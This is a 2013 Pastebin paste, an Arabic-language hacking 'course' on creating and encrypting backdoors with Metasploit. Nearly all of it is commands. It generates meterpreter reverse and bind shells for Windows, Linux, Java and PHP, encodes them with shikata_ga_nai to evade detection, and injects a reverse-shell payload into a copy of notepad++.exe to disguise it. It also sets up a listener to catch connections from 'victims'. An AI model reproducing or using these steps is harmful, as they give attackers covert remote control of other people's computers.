Advertisement
Guest User

اختراق الداخلي والخارجي : صناعة باكدور بجميع الصيغ و تشفيره

a guest
Jun 30th, 2013
855
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1.  
  2.  
  3. :: Hackshow Professional Network ::
  4.  
  5. Course : Backtrack
  6.  
  7. by : Hacker Fantome195
  8.  
  9.  
  10. Backdoor صناعة الباكدور
  11.  
  12. java / php / exe / perl /ruby...
  13.  
  14.  
  15.  
  16. مستلزمات : بورت مفتوح في حالة اتصال عكسي
  17.  
  18. تبيت الضحايا : ايبي ضحية وايبي تبعك يجب ان يكونان مثبتين او بعد اختراق ترفع سرفر ﻻي برنامج اختراق
  19.  
  20. -----------------------------------------------------------------------------------------------
  21.  
  22. msfpayload -l
  23.  
  24.  
  25. معرفة الخيارت الخاصة بكل بايلود
  26.  
  27. msfpayload windows/shell_bind_tcp O
  28.  
  29. ----------------------------------------------windows backdoor---------------------------------------
  30.  
  31. بابلود يعتمد على اتصال عكسي
  32.  
  33. msfpayload windows/meterpreter/reverse_tcp lhost= lport= X > back.exe
  34.  
  35. اتصال مباشر
  36.  
  37. msfpayload windows/meterpreter/bind_tcp lport= X > back.exe
  38.  
  39. -----------------------------------------------------------------------------------------------------------------
  40.  
  41. تنصت على الهدف في حالة بايلود perl / ruby /php
  42.  
  43. nc ip port
  44.  
  45. -----------------------------------------------------------------------------------------------------
  46.  
  47. مرحلة التشفير
  48.  
  49.  
  50. msfencode -l
  51.  
  52. امر التشفير في الميتا او في كونسول
  53.  
  54. msfencode -t exe -x back.exe -o back_crypt.exe -e x86/shikata_ga_nai -c 3
  55.  
  56. حقن الباكدور في ملف exe مع تشفيروا
  57.  
  58. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.191 LPORT=443 R | msfencode -t exe -x notepad++.exe -o notepad++_crypt.exe -e x86/shikata_ga_nai -c 3
  59.  
  60.  
  61.  
  62. ----------------------------Linux backdoor----------------------------------------------------------
  63.  
  64.  
  65. msfpayload linux/x86/meterpreter/bind_tcp LPORT=80 R | msfencode -t elf > linux_meterpreter
  66.  
  67. chmod u+x linux_meterpreter
  68. ./linux_meterpreter
  69.  
  70. --------------------java backdoor--------------------------------------------------------------------
  71.  
  72. ./msfpayload java/meterpreter/reverse_tcp LHOST= LPORT= J > back.jar
  73.  
  74. ./msfpayload java/meterpreter/bind_tcp LPORT= J > back.jar
  75.  
  76. -------------------------------------php Backdoor----------------------------------------------------
  77.  
  78. msfpayload php/meterpreter/reverse_tcp LHOST= LPORT= R > back.php
  79.  
  80. شفره ب base 64 بنفسك
  81.  
  82.  
  83.  
  84. الأن طريقة ربط اتصال مع الهدف
  85.  
  86. msfconsole
  87.  
  88. use exploit/multi/handler
  89.  
  90. use multi/handler
  91.  
  92. set PAYLOAD البايلود الذي وضعت
  93.  
  94. set LPORT البورت
  95.  
  96. set RHOST [ايبي الهدف ]
  97.  
  98.  
  99.  
  100. copyright 2013-2014
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement